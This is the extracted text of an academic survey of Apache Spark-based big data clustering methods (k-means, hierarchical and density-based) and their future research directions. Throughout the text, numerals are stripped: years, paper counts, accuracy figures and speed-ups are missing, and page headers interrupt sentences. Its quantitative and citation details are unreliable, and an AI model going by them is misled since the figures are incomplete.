developing spark-based clustering would benefit from the findings of this comprehensive review. the rest of this survey is organised as follows. ‘background’ presents the related surveys to the topic of clustering big data. in ‘literature review’, we present a background on the apache spark. ‘survey methodology’ explains the methodology used in this survey. ‘survey methodology’ discusses the different spark clustering algorithms. in ‘discussion and future direction’, we present our discussion the clustering big data using spark and future work. finally, we conclude the paper in ‘conclusions’. background over the last decade, a huge amount of data has been generated. this increase in data volume is attributed to the growing adoption of mobile phones, cloud-based applications, artificial intelligence and internet of things. contemporary data come from different sources with high volume, variety and velocity, which make the process of mining extremely challenging and time consuming (labrinidis & jagadish, ). these factors have motivated the academic and the industrial communities to develop various distributed frameworks to handle the complexity of modern datasets in a reasonable amount of time. in this regard, apache spark, a cluster computing, is an emerging parallel platform that is cost-effective, fast, fault-tolerant and scalable. thereby, such features make spark an ideal platform for the dynamic nature of the contemporary applications. spark is designed to support a wide range of workloads including batch applications, iterative algorithms, interactive queries, and streaming (gousios, ). spark extends the hadoop model and support features such as in-memory computation and resilient distributed dataset, which make it significantly faster than the traditional hadoop map-reduce for processing large data (aziz, zaidouni & bellafkih, ). as shown in fig. , at the fundamental level, spark consist of two main components; a driver which takes the user code and convert it into multiple tasks which can be distributed across the hosts, and executors to perform the required tasks in parallel. spark is based on rdd, which is a database tables that is distributed across the nodes of the cluster. spark supports two main operations; transformations; and actions. transformation preform operations on the rdd and generates new one; action operations are performed on rdd to produce the output (salloum et al., ). spark components spark core spark core is the foundation of apache spark and contains important functionalities, including components for task scheduling, memory management, fault recovery, interacting with storage systems. spark core is also home to the api that defines resilient saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure apache spark architecture. full-size doi: . /peerjcs. /fig- distributed datasets (rdds), which are spark’s main programming abstraction. rdds represent a collection of items distributed across many compute nodes that can be manipulated in parallel. spark core provides many apis for building and manipulating these collections (mishra, pathan & murthy, ). spark streaming spark streaming component provide scalable, high throughput api for processing of real-time stream data from various sources. examples of data streams include logfiles generated by production web servers, or queues of messages containing status updates of a particular system (aziz, zaidouni & bellafkih, ). spark mllib spark comes with a library mllib which supports several common machine learning algorithms that include classification, regression, clustering, features extraction, transformation and dimensionality reductions (assefi et al., ). spark sql spark sql (armbrust et al., ) is a module for processing structured data, which also enables users to perform sql queries. this module is based on the rdd abstraction by providing spark core engine with more information about the structure of the data. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. spark graphx graphx (xin et al., ) is a library for manipulating graphs (e.g., a social network’s friend graph) and performing graph-parallel computations. like spark streaming and spark sql, graphx extends the spark rdd api, allowing us to create a directed graph with arbitrary properties attached to each vertex and edge. graphx also provides various operators for manipulating graphs (e.g., subgraph and mapvertices) and a library of common graph algorithms. clustering big data clustering is a popular unsupervised method and an essential tool for big data analysis. clustering can be used either as a pre-processing step to reduce data dimensionality before running the learning algorithm, or as a statistical tool to discover useful patterns within a dataset. clustering methods are based on iterative optimization (xu & tian, ). although these methods are effective in extracting useful pattern from datasets, they consume massive computing resources and come with high computational costs due to the high dimensionality associated with contemporary data applications (zerhari, lahcen & mouline, ). challenges of clustering big data the challenges of clustering big data are characterized into three main components: . volume: as the scale of the data generated by modern technologies is rising exponentially, clustering methods become computationally expensive and do not scale up to very large datasets. . velocity: this refers to the rate of speed in which data is incoming to the system. dealing with high velocity data requires the development of more dynamic clustering methods to derive useful information in real time. . variety: current data are heterogeneous and mostly unstructured, which make the issue to manage, merge and govern data extremely challenging. conventional clustering algorithms cannot handle the complexity of big data due the above reasons. for example, k-means algorithm is an np-hard, even when the number of clusters is small. consequently, scalability is a major challenge in big data. traditional clustering methods were developed to run over a single machine and various techniques are used to improve their performance. for instance, sampling method is used to perform clustering on samples of the data and then generalize it to the whole dataset. this reduces the amount of memory needed to process the data but results in lower accuracy. another technique is features reduction where the dimension of the dataset is projected into lower dimensional space to speed up the process of mining (shirkhorshidi et al., ). nevertheless, the constant growth in big data volume exceeds the capacity of a single machine, which underline the need for clustering algorithms that can run in parallel across multiple machines. for this purpose, apache spark has been widely adapted to cope with big data clustering issues. spark provides in-memory, distributed and iterative computation, which is particularly useful for performing clustering computation. it also provides advanced local data caching system, fault-tolerant mechanism and faster-distributed file system. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. literature review the topic of clustering big data using spark platform have not been adequately investigated by academia. this suggests a comprehensive survey on research works in this regard. the literature in this area has already come up with some surveys and taxonomies, but most of them are related to hadoop platform while others are outdated or do not cover every aspect of clustering big data using spark. the work in rotsnarani & mrutyunjaya ( ) conducted a survey on hadoop framework for big data processing. different features of hadoop map-reduce are discussed to deal with the problems of scalability and complexity for processing big data. rujal & dabhi ( ) conducted a survey on k-means using map reduce model. in this article the technical details of parallelizing k-means using apache hadoop is discussed. according to this research, k-means method is regarded as a viable approach for certain applications of big data clustering and has attracted many researchers than any other techniques. on the other hand, (sood & singh, ) conducted a survey on the major challenges for big data processing using hadoop map- reduce. according to this survey, network latency is the main limitation of hadoop. the authors of manwal & gupta ( ) conducted a survey on big data and hadoop architecture. the paper classifies existing hadoop based systems and discusses their advantages and disadvantages. the paper explains the different technologies (hbase, hive, pig, etc.) used with the hadoop distributed file system (hdfs). jiang et al. ( ) conducted a survey on large scale data processing using hadoop over the cloud. the main components of hadoop platform and their functionalities are discussed. the work in shanjiang et al. ( ) conducted a comprehensive survey on spark ecosystem for processing large-scale data. in this article, spark architecture and programming model is introduced. the authors discussed the pros and cos of spark platform as well as the various optimization techniques used for improving spark performance for processing large scale data. in maheshwar & haritha ( ), the authors discussed the advantages of spark over the hadoop map-reduce model. huang et al. ( ) conducted a survey on the parallelization of density-based clustering algorithm for spatial data mining based on spark. the authors of ketu & agarwal ( ) conducted a performance evaluation of k-means over spark and map- reduce. on the other hand, a performance evaluation of three versions of k-means clustering for biomedical data using spark was conducted in shobanadevi & maragatham ( ). a performance evaluation of parallel k-means with optimization algorithms for clustering big data using spark was conducted in santhi & jose ( ). however, all the above surveys are either before or do not present a comprehensive discussion on all types of clusters. therefore, a comprehensive survey on clustering algorithms of big data using apache spark is required to assess the current state-of-the-art and outline the future directions of clustering big data. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. survey methodology the subject matter reviewed in this article is based on a literature review in clustering methods using apache spark. we searched for the works regarding this topic and classify them into different clustering techniques. all these papers talk about optimizing clustering techniques to solve the issues of big data clustering problems for various problems, viz., improve clustering accuracy, minimize execution time, increase throughput and scalability. particularly, we are addressing the following questions: • what are the types of spark-based clustering methods? • which methods were used in the literature to cluster big data? • what are the gaps in this research area? • what optimization techniques were used in clustering? • what are the pros and cons of the different spark-based clustering methods? search strategy to narrow the scope of the searching for relevant papers to be included in this study, we used the ‘‘and’’ and ‘‘or’’ boolean operators to combine the terms related to spark-based clustering of big data. the following terms are used to find the relevant papers. • ‘‘clustering big data using spark’’, • ‘‘apache spark for big data’’, • ‘‘clustering big data’’, • ‘‘clustering methods’’, • ‘‘data partitioning’’, • ‘‘big data partitioning’’, • ‘‘data segmentation’’. the papers relevant to spark-based clustering of big data were retrieved from the following online sources. • ieee explorer • springer, • elsevier • sciencedirect, • google scholar, • researchgate, paper filtering initially , and additional reference books papers were identified through our search using the previously explained research strategies. as shown in fig. , of these were eliminated via our exclusion criteria. papers were remaining. by reading and analysing the full-text articles, of them were excluded. irrelevant papers were removed by applying the exclusion criteria (shown below). in addition, duplicate papers retrieved from multiple sources were removed. finally, articles were included in this survey. the following inclusion/exclusion rules are applied on these papers. • inclusion criteria: saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. records identified through database searching (n = ) s cr e e n in g in cl u d e d e li g ib il it y id e n ti fi ca ti o n additional records identified through other sources (n = ) records after duplicates removed (n = ) records screened (n = ) records excluded (n = ) full-text articles assessed for eligibility (n = ) full-text articles excluded, with reasons (n = ) studies included in qualitative synthesis (n = ) studies included in quantitative synthesis (meta-analysis) (n = ) figure flowchart for paper exclusion. full-size doi: . /peerjcs. /fig- – papers published within the period from january to april . – papers in the area of spark-based big data clustering. – papers written in english language. • exclusion criteria: – papers on clustering but not on big data. – papers that are not using a big data platform such as spark. papers with no clear publication information, such as publisher, year, etc. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure taxonomy of spark-based clustering methods. full-size doi: . /peerjcs. /fig- spark-based clustering algorithms in this work, the taxonomy of spark-based big data clustering is developed to cover all the existing methods. figure shows the developed taxonomy. survey findings: the research questions (see ‘survey methodology’) that we investigated in this survey are addressed as shown below: • answer to q : the spark-based clustering algorithms were divided into three main categories: k-means based methods, hierarchal-based methods and density based methods. each of these main categories were divided further into subcategories as depicted in fig. . a detailed discussion of the spark-based clustering methods in these subcategories is presented in the subsection below ‘k-means based clustering’, ‘hierarchical clustering’ and ‘density based-clustering’ fig. and table ). • answer to q : we discuss the different methods that have been proposed in the literature under each of the three main spark-based clustering categories in ‘k-means based clustering’, ‘hierarchical clustering’ and ‘density based-clustering’. the methods in these subsections are grouped based on their similarities in the approach. this grouping of the discussed methods is shown in table . • answer to q : the gaps in the spark-based clustering field are identified into two main points. the first is the lack of utilizing ai tools in clustering data and lack of using big data platforms. the second is that most current clustering methods do not support the characteristics of variety and velocity of big data. more discussion on this issue is in ‘discussion and future direction’. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison of spark-based clustering methods in terms of the supported big data characteristic (volume, variety and velocity) and in terms of the type of data (real and synthetic) the proposed method was validated. category sub-category paper supported big data characteristic validated on volume variety velocity real synthetic kusuma et al. ( ) √ √ √ sarazin, lebbah & azzag ( ) √ √ gao & zhang ( ) √ √ thakur & dharavath ( ) √ √ lighari & hussain ( ) √ √ machine learning kamaruddin, ravi & mayank ( ) √ √ √ √ wu et al. ( ) √ √ win et al. ( a) √ √ win et al. ( b) √ √ liu et al. ( ) √ √ fuzzy bharill, tiwari & malviya ( ) √ √ shah ( ) √ √ lavanya, sairabanu & jain ( ) √ √ pang et al. ( ) √ √statistics chakravorty et al. ( ) √ √ √ √ wang et al. ( ) √ √ √ sinha & jana ( ) √ √ backhoff & ntoutsi ( ) √ √ √ ding et al. ( ) √ √ sharma, shokeen & mathur ( ) √ √ ben hajkacem, ben n’cir & essoussi ( ) √ √ √ √ ben hajkacem, ben n’cir & essoussi ( ) √ √ √ √ zayani, ben n’cir & essoussi ( ) √ √ √ chitrakar & petrovic ( ) √ √ fatta & al ghamdi ( ) √ √ zhang et al. ( ) √ √ solaimani et al. ( ) √ √ √ √ k-means scalable mallios et al. ( ) √ √ guo, zhang & zhang ( ) √ √ ianni et al. ( ) √ √data mining lee & kim ( ) √ √ sarazin, azzag & lebbah ( ) √ √ √ machine learning malondkar et al. ( ) √ √ √ √ jin et al. ( ) √ √ solaimani et al. ( ) √ √ √ √ hierarchical scalable hassani et al. ( ) √ (continued on next page) saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) category sub-category paper supported big data characteristic validated on volume variety velocity real synthetic rui et al. ( ) √ √ zhou & wang ( ) √ √ √ kim et al. ( ) √ √graph lulli, dell’amico & ricci ( ) √ √ √ han et al. ( a) √ √ hosseini & kourosh ( ) √ √ √data mining aryal & wang ( ) √ √ hosseini & kiani ( ) √ √ √ corizzo et al. ( ) √ √ √ √machine learning liang et al. ( ) √ √ √ luo et al. ( ) √ √ han et al. ( b) √ √ √ baralis, garza & pastor ( ) √ √ density scalable gong, sinnott & rimba ( ) √ √ • answer to q : some existing works employed optimization techniques to improve clustering results. these optimization techniques were mainly used with k-means methods as discussed in ‘fuzzy based methods’ and ‘clustering optimization’. • answer to q : the pros and cons of the different methods are discussed in the ‘k-means based clustering’, ‘hierarchical clustering’ and ‘density based-clustering’, that discuss the different types of spark-based clustering methods. we also discuss our findings related to the spark-based clustering methods in ‘discussion and future direction’. k-means based clustering this method divides the data into disjoint clusters of similar points. in each cluster, a central point is obtained via a distance function and is considered as the centroid of all other points within the cluster. the clusters are iteratively optimized until an optimal solution is reached. k-mean is a framework of clustering or a family of distance functions, which provides the basis for different variants of k-mean algorithms. k means is extensively used in clustering big data due to its simplicity and fast convergence. one major backward of k-means is the priori setting of the number of clusters, which have significant effect on the accuracy of final classification (hartigan, wong & algorithm, ). in addition, k-means is not suited in situations where the clusters do not show convex distributed or vary in sizes (jain, ). due to these limitations, several modifications of k -means have been proposed such as fuzzy k-means and k-means++ (huang, ). several works have been conducted to execute k-means effectively under the spark framework to improve its performance and scalability. therefore, the spark-based k-means methods can be divided into four subcategories: machine learning based methods, fuzzy based methods, statistics based methods and scalable methods. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. machine learning based methods the authors of kusuma et al. ( ) designed intelligent k-means based on spark. intelligent k-means is a fully unsupervised learning that cluster data without any information regarding the number of clusters. a parallel implementation of biclustering using map-reduce over spark platform was proposed by sarazin, lebbah & azzag ( ). for improving the selection process of k-means, (gao & zhang, ) combines particle swarm optimization and cuckoo-search to initiate better cluster centroid selections using spark framework. the work in thakur & dharavath ( ) proposes a hybrid approach that integrate k-means and decision tree to cluster and detect anomaly in big data. at first, k-means is applied on the data to produce the clusters and then decision tree algorithm is applied on each cluster to classify normal and anomaly instances. in lighari & hussain ( ) the author combines rule based and k-means algorithm for the detection of network anomalies using apache spark. rule based is used for the detection of known attacked, while k-means is used as unsupervised learning for the detection of new unknown attacks. kdd cup dataset was used to evaluate the algorithm and % accuracy was achieved. a paralleled algorithm for the evolving clustering method was proposed by kamaruddin, ravi & mayank ( ). emc is an online method which process one data sample on a single pass and there is no iteration required to process the same data again. these features make the algorithm highly efficient for processing contemporary real time applications where data arrive in a stream with high dimensionality. the authors evaluated the proposed algorithm using massive credit card fraud dataset and the results show its superiority over the traditional single emc method. fuzzy based methods the authors of wu et al. ( ) proposed a parallel implementation of fuzzy consensus clustering for on the spark platform for processing large scale heterogenous data. the authors of win et al. ( a) developed a crime pattern-discovery system based on fuzzy clustering under spark. the method uses l norm rather than euclidian distance to optimize the distance computations. in another paper, the fuzzy clustering method is used under spark to detect potential criminal patterns in large-scale spatiotemporal datasets (win et al., b). in liu et al. ( ) the authors developed a parallel fuzzy based image segmentation algorithm for handling big data in the agriculture field. at first, the images were converted to rgb and distributed to the available nodes in cloud. then, the membership of pixel points to different cluster centroids were calculated. finally, the centroids of the clusters are updated iteratively until an optimal solution is obtained. the performance of the algorithm was evaluated using the spark platform and a significant reduction in execution time compared to hadoop-based approach. the authors of bharill, tiwari & malviya ( ) proposed an algorithm of fuzzy c-means. the proposed algorithm is a modification of the scalable random sampling with iterative optimization (srsio-fcm). the highlighted characteristics of this research were the elimination of the need for maintaining the membership matrix, which proved pivotal in reducing execution time. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. statistics based methods the authors of shah ( ) used apache spark to perform text clustering. two algorithms were used: k-means and lda. lda is widely used technique for clustering high dimensional text data and it produces considerably higher clustering accuracy than conventional k- means. in lavanya, sairabanu & jain ( ) the authors used gaussian mixture model on spark mllib to cluster the zika virus epidemic. the produced clusters were useful to visualize the spread of the virus during the epidemic. the authors of pang et al. ( ) implemented gmm clustering method under the framework of spark. gibbs sampling method is used instead of expectation maximization algorithm to estimate the parameters of the model. the efficiency of the algorithms was verified via multi-method comparison. the authors in chakravorty et al. ( ) presented a novel distributed gaussian based clustering algorithm for analysing the behaviour of households in terms of energy consumption. various factors such as weather conditions, type of day and time of the day were considered. the proposed algorithm under spark shows a higher accuracy than other standard regression methods for energy consumption forecasting. scalable methods a parallel implementation of k means algorithm over spark is proposed in wang et al. ( ). the proposed algorithm involves three strategies for seeding: ( ) a subset of data is selected randomly for partitioning. ( ) sequentially selecting k instance based on probability. ( ) stochastically selecting seeds in parallel. the efficiency of the proposed algorithm was demonstrated via experiments on large scale text and uci datasets. in another paper, the authors addressed the issue of pre-determining the number of input clusters which is a present problem in most k-means methods by automating the number of input clusters which resulted in better clustering quality when processing large scale data (sinha & jana, ). in backhoff & ntoutsi ( ), the authors presented a scalable k-means algorithm based on spark streaming for processing real time- data. the algorithm consists of two parts. one part runs an online algorithm over the stream data and obtains only statistically relevant information and another part that uses an offline algorithm on the results of the former to produce the actual clusters. since the algorithm only retains statistically relevant information, it’s possible to save more physical spaces. in addition, the proposed algorithm can explain the evolution of the data as all the needed information is retrievable from the stored statistical information. the authors of ding et al. ( ) used k-means under spark to cluster students’ behaviors into different categories using information gathered from universities’ information system management. it is a powerful technique for performing simultaneous clustering of rows and columns in a matrix data format. this method is used extensively for the study of genes expression. the authors of sharma, shokeen & mathur ( ) clustered satellite images in an astronomy study using in k-means++ under the spark framework. in this paper, the authors simultaneously apply k-means multiple times with different initial centroids and value of k under each iteration. the optimal value of k is determined by clusters validity index for all the executions. the work in ben hajkacem, ben n’cir & saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. essoussi ( ) presented a spark-based k-prototypes (skp) clustering method for mixed large-scale data analysis. the authors exploit the in-memory operations of spark to reduce the consumption time of mrkp method. the method was evaluated using simulated and real datasets under spark and hadoop platform and the results show that higher efficiency and scalability is achieved under spark. the authors of ben hajkacem, ben n’cir & essoussi ( ) implemented a scalable random sampling for k-prototypes using spark. the algorithm randomly selects a small group of data points and approximate the cluster centers from these data. as a result, the method perform computation for only small portion of the whole data set, which result in a significant speedup of existing k-prototypes methods. a parallel overlapping k-means algorithm (pokm) is proposed in zayani, ben n’cir & essoussi ( ). this algorithm can perform parallel clustering processes leading to non-disjoint partitioning of data. an implementation of parallel k-means with triangle inequality based on spark is proposed in chitrakar & petrovic ( ). the method is an improved version of k-means, which is supposed to speed up the process of analysis by skipping many point-centre distance computations, which can be beneficial when clustering high dimensional data. the authors of fatta & al ghamdi ( ) implemented k-means with triangle inequality to reduce search time and avoid redundant computation. the authors point out that the efficiency of k-means can be improved significantly using triangle inequality optimisations. a distributed possibilistic c-means algorithm is proposed in zhang et al. ( ). possibilistic c means differ from other k-means techniques by assigning probabilistic membership values in each cluster for every input point rather than assigning a point to a single cluster. the authors of solaimani et al. ( ) implemented an adaptive k-mean using spark stream framework for real time-anomaly detection in clouds virtual machines. the authors evaluated the method under spark and storm in terms of the average delays of tuples during clustering and prediction and the results indicate that spark is significantly faster than storm. mallios et al. ( ) designed a framework for clustering and classification of big data. the framework integrates k-means and decision tree learning (id ) algorithms. the authors evaluated the framework under spark in cluster of nodes. the results show that the proposed algorithms outperform spark machine learning library but is slightly slower than the approximate k-means. hierarchical clustering this clustering technique is composed of two approaches: agglomerative and divisive. the first approach considers every data point as a starter in its singleton cluster and the two nearest clusters are combined in each iteration until the two different points belong to a similar cluster. however, the second approach performs recursive top-down splitting. the existing hierarchical clustering methods can be divided into three subcategories: data mining based methods, machine learning based methods and scalable methods. data mining based methods a weighted agglomerative hierarchical clustering algorithm is introduced in guo, zhang & zhang ( ). the algorithm was developed to analyse residents’ activities in china. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the data was based on the mobile phone’s connection with the nearest stations, and within a week that data was collected and stored in spark for analysing. at first, hot areas where there are large population were identified, followed by an analysis of pedestrian’s flow for each hot area. meaningful information was obtained at less cost and higher accuracy than the traditional method of investigation. the work in ianni et al. ( ) proposed a distributed-hierarchical based clustering algorithm that combines the features of the divisive and agglomerative methods. the method consists of two operations. the first operation performs a division on the domain of the dataset using the definition of binary space partition, which yields a set of coarse clusters that are then refined by identifying outliers and assigning remaining points to nearest cluster. the second operation involves an agglomerative procedure over the previously refined clusters. in lee & kim ( ), they proposed a distributed-based hierarchical clustering system for large-scale semiconductor wafers (dhcssw) by applying the big data spark framework to existing hierarchical clustering algorithm. machine learning based methods in sarazin, azzag & lebbah ( ), the authors designed clustering algorithms that can be used in mapreduce using spark platform. particularly, they focus on the practical and popular serial self-organizing map clustering algorithm (som). malondkar et al. ( ) proposed an algorithm called spark-ghsom, which scales to large real-world datasets on a distributed cluster. moreover, it also proposed a new distance hierarchy approach for mixed attribute datasets and generated a multi-level hierarchy of som layers. scalable methods in jin et al. ( ), a parallel algorithm of single-linkage hierarchical clustering was proposed by formulating the problem as a minimum spanning tree problem. the algorithm was evaluated using two large datasets with different distributions. the authors observed that spark is totally successful for the parallelization of linkage hierarchical clustering with acceptable scalability and high performance. the work in solaimani et al. ( ) proposed a system to detect anomaly for multi-source vmware-based cloud data center. the framework monitors vmware performance stream data (e.g., cpu load, memory usage, etc.) continuously. the authors of hassani et al. ( ) presented an incremental hierarchical density-based stream clustering algorithm based on cluster stability. density-based clustering density-based clustering approaches in comparison with other types of clustering algorithms have some superiorities, such as clustering arbitrary shape groups of data regardless of the geometry and distribution of data, robustness to outliers, independence from the initial start point of the algorithm, and its deterministic and consistent results in the repeat of the similar algorithm. motivated by these features, several studies have been conducted on the parallelization of density clustering method over spark. density-based clustering methods can be divided into four subcategories: graph based methods, data mining based methods, machine learning based methods and scalable methods. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. graph based methods in rui et al. ( ), the authors proposed a parallel implementation of density peaks clustering algorithm based on spark’s graphx. the method was evaluated using spark and the results indicate that spark can perform up to x time faster compared to hadoop map- reduce implementation. zhou & wang ( ) proposed a distributed parallel algorithm of structure similarity clustering based on spark (sparkscan) to cluster directed graph. similarly, the authors of kim et al. ( ) exploited the advantage of the in-memory computation feature of spark to design a distributed network algorithm called cass for clustering large-scale network based on structure similarity. optimization approaches such as bloom filter and shuffle selection are used to reduce memory usage and execution time. lulli, dell’amico & ricci ( ) designed a distributed algorithm that produces an approximate solution to the exact dbscan clustering. the method uses vertex-centric instead of euclidean distance whereby a neighbourhood graph is computed. data mining based methods in another paper han et al. ( a), the authors presented a fast parallel dbscan algorithm using spark to get around the shuffle operation. each executor computes the partial clusters locally. the merging process is deferred until all the partial clusters have been sent back to the driver. in hosseini & kourosh ( ) the authors propose a scalable distributed density based hesitant fuzzy clustering for finding similar expression between distinct genes. the proposed method benefits from the robustness of density-based clustering against outliers and from the weighted correlation operators of hesitant fuzzy clustering to measure similarity. the output clusters are based on the content of the neighbour graph. aryal & wang ( ) designed and implemented a scalable shared nearest neighbours clustering called sparksnn over spark framework. shared nearest neighbours is proven efficient for handling high-dimensional spatiotemporal data. the algorithm was evaluated in terms of scalability and speed-up using marylanf crime data, the results demonstrated the effectiveness of the proposed algorithm. machine learning based methods an algorithm based on adaptive density estimation is proposed for distributed big data approach and tested on some prevalent datasets. this algorithm has no dependency, and every step of the algorithm executes independently. bayesian locality sensitive hashing (lsh) is used to divide the input data into partitions. the outliers are filtered out by locality preservation, which makes this approach robust. the clusters are made very much homogenous via density definition on ordered weighted averaging distance hosseini & kiani ( ). a scalable distributed density-based clustering for performing multi- regression tasks is proposed in corizzo et al. ( ). in this work, locality sensitive hashing is used to enable the algorithm to handle high dimensional data. a distributed clustering algorithm named remold is introduced in liang et al. ( ). a two-step strategy has been applied in the remold algorithm. in the first step, it uses the lsh partitioning method for balancing the effect of runtime and local clustering while in the second step the partitions are clustered locally and independently using kernel-density and higher-density saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nearest neighbour. gaussian distribution is used to model the local clusters. these models are eventually assembled at a central server to form the global clusters. scalable methods in luo et al. ( ), a parallel implementation of dbscan algorithm (s_ dbscan) based on spark is proposed. the algorithm is divided into three stages; partitioning the input data based on random sampling; perform local dbscan in parallel to generate partial clusters; merge the partial clusters based on the centroid. the algorithm can quickly realize the mergers and divisions of clustering results from the original data. the authors compared the performance of their parallel algorithm with a serial version on the spark platform for massive data processing and an improvement in performance was demonstrated. han et al. ( b) proposed a scalable parallel implementation of dbscan algorithm in apache spark by applying a partitioning strategy. the algorithm uses a kd-tree in order to reduce the search time. to achieve better performance and scalability, a partitioning technique is applied to produce balanced sub-domains, which can be computed within spark executors. an implementation of dbscan algorithm using spark is proposed in baralis, garza & pastor ( ). initially, a pre-processing step is applied on the dataset to produce a set of representative points while retaining the original data distribution and density information. this enables the algorithm to scale up to large scale data. the new set is then used as an input to the algorithm for clustering. a real-time density-based clustering algorithm (rt-dbscan) is proposed in gong, sinnott & rimba ( ). rt-dbscan is an extension of dbscan for supporting streamed data analysis. the algorithm employs the concept of spatiotemporal distance for clustering spatio-temporal data. the algorithm was implemented over spark stream and evaluated using social media content. clustering optimization some spark-based clustering techniques, especially the k-means based methods, were supported by optimization techniques to improve their clustering results. due to the rise of ai based computing in recent years, some research works have utilized ai tool in enhancing the clustering methods while leveraging the benefits of big data platforms such as spark. other studies adapt optimization techniques to improve the performance of clustering methods. sherar & zulkernine ( ) proposed a hybrid method composed of pso and k-means using apache spark. the diversity of the swarm ensures that a global search is conducted, hence, the resulting cluster centroids are not dependent on the initial choice. the approach was compared with stand-alone k-means and it showed better performance in terms of convergence. hasan et al. ( ) proposed an adaptive swarm-based clustering for stream processing of twitter data. initially, fuzzy c-means is applied as pre-processing step to produce the initial cluster centres, then the clusters are further optimized using adaptive particle swarm optimization. the authors of wang & qian ( ) and (bonab et al., ) combined the robust artificial bee colony algorithm with the powerful spark framework for large scale data analysis. the characteristics of abc makes the algorithms avoid local minimum while spark in memory computation accelerates the speed of computation and convergence saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. time. the kdd cup data was utilized to verify the effectiveness of the method. the experimental results show that the algorithm produce high clustering quality and nearly as fast as the serial algorithms. other unsupervised learning such as self-organised map has also been proposed (sarazin, azzag & lebbah, ). to tackle high dimensional data, subspace clustering was proposed by sembiring, jasni & embong ( ). discussion and future direction from the discussion of the previous section, we note that most existing methods (see table ) have addressed the volume characteristic of the big data used in their experiments. however, few existing methods have shown that their methods support the variety and velocity characteristics of the used big data. additionally, most methods used real big data validate their proposed methods as seen in table . from table , we conclude that there is a lot of room for research in clustering methods to support the characteristics of variety and velocity of big data since only few works have addressed these issues. a fundamental assumption of most clustering algorithms is that all data features are considered equally important. however, such approach often fails in high dimensional space. a subspace clustering overcome the issue of high dimensional data by establishing a set of features that it supposes to be most significant for each cluster. since the big data platforms were only developed in the last few years, the existing clustering problems adapted to such platforms were extensions of the traditional clustering techniques. researchers are yet to develop clustering techniques that are native to the big data platforms such as spark. the research direction of adapting the optimization techniques such as psa, bee colony and abc to smoothly work with spark is yet to be investigated by researchers who are interested in clustering big data. another area of research that is has not been fully investigated is adopting fuzzy-based clustering algorithms on spark. in general, due to the infancy of spark-based clustering algorithms, only few researchers attempted designing techniques that leverage the potential of parallelism of spark in cluster big data. in the coming years, we foresee a large influx of research works in this important area of spark-based clustering of big data. particularly, there are ample opportunities in future research to utilize ai tools in clustering data while leveraging the benefits of big data platforms such as spark. in table , we note that most of the papers used in this survey were extracted from the ieee explorer. however, the other data sources shown in table were of great benefit to this survey. an interesting finding was shown in table , where most the existing spark-based clustering were published in the years – . this indicates that clustering methods that leverage big data platforms is still in its early days and there is a lot of potential of research in this area. in summary, we highlight three new research directions: • utilizing ai tools in clustering data while leveraging the benefits of big data platforms such as spark. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table shows the data sources of the spark-based clustering papers. data source paper ieee explorer dave & gianey ( ), hu et al. ( ), fasheng & xiong ( ), ajin & kumar ( ), verma, mansuri & jain ( ), xin et al. ( ), xu & tian ( ), manwal & gupta ( ), shanjiang et al. ( ), wang et al. ( ), sinha & jana ( ), kusuma et al. ( ), backhoff & ntoutsi ( ), ding et al. ( ), sarazin, lebbah & azzag ( ), ben hajkacem, ben n’cir & essoussi ( ), wu et al. ( ), zayani, ben n’cir & essoussi ( ), chitrakar & petrovic ( ), win et al. ( b), liu et al. ( ), solaimani et al. ( ), chakravorty et al. ( ), lighari & hussain ( ), jin et al. ( ), guo, zhang & zhang ( ), solaimani et al. ( ), lee & kim ( ), hassani et al. ( ), sarazin, azzag & lebbah ( ), luo et al. ( ), han et al. ( b), aryal & wang ( ), liang et al. ( ), sherar & zulkernine ( ), wang & qian ( ), sarazin, azzag & lebbah ( b) elsevier bhadani & jothimani ( ), ben hajkacem, ben n’cir & essoussi ( ), rui et al. ( ) springer othman et al. ( ), baltas, kanavos & tsakalidis ( ), zerhari, lahcen & mouline ( ), rujal & dabhi ( ), sood, akshay & singh ( ), ketu & agarwal ( ), santhi & jose ( ), jain ( ), huang ( ), ben hajkacem, ben n’cir & essoussi ( ), win et al. ( a), gao & zhang ( ), pang et al. ( ), mallios et al. ( ), thakur & dharavath ( ), kamaruddin, ravi & mayank ( ), han et al. ( a), corizzo et al. ( ), zhou & wang ( ), gong, sinnott & rimba ( ), bonab et al. ( ) google scholar kim ( ), sharma, shokeen & mathur ( ), gousios ( ), aziz, zaidouni & bellafkih ( ), mishra, pathan & murthy ( ), jiang et al. ( ), shobanadevi & maragatham ( ), lavanya, sairabanu & jain ( ), kim et al. ( ), lulli, dell’amico & ricci ( ), hasan et al. ( ) researchgate shoro & soomro ( ), salloum et al. ( ), assefi et al. ( ), armbrust et al. ( ), hosseini & kiani ( ), hartigan, wong & algorithm ( ), shah ( ), fatta & al ghamdi ( ), sarazin, azzag & lebbah ( b) 